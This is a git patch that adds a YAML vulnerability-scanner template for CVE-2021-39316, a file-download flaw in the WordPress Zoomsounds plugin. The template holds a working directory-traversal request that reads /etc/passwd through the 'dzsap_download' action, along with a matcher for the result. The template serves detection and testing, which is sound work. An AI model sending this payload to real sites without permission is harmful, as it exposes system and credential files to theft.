From 2df403879a942c21663b8eb2a85aecadf3c0e62a Mon Sep 17 00:00:00 2001
From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com>
Date: Thu, 23 Sep 2021 07:07:52 +0700
Subject: [PATCH] Create CVE-2021-39316.yaml

---
 cves/2021/CVE-2021-39316.yaml | 25 +++++++++++++++++++++++++
 1 file changed, 25 insertions(+)
 create mode 100644 cves/2021/CVE-2021-39316.yaml

diff --git a/cves/2021/CVE-2021-39316.yaml b/cves/2021/CVE-2021-39316.yaml
new file mode 100644
index 0000000000..579b66c1ec
--- /dev/null
+++ b/cves/2021/CVE-2021-39316.yaml
@@ -0,0 +1,25 @@
+id: CVE-2021-39316
+
+info:
+  name: DZS Zoomsounds < 6.50 - Unauthenticated Arbitrary File Download
+  author: daffainfo
+  severity: high
+  description: The Zoomsounds plugin <= 6.45 for WordPress allows arbitrary files, including sensitive configuration files such as wp-config.php, to be downloaded via the `dzsap_download` action using directory traversal in the `link` parameter.
+  reference: https://wpscan.com/vulnerability/d2d60cf7-e4d3-42b6-8dfe-7809f87547bd
+  tags: wordpress,cve2021,cve,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/?action=dzsap_download&link=../../../../../../../../../../../../../etc/passwd"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200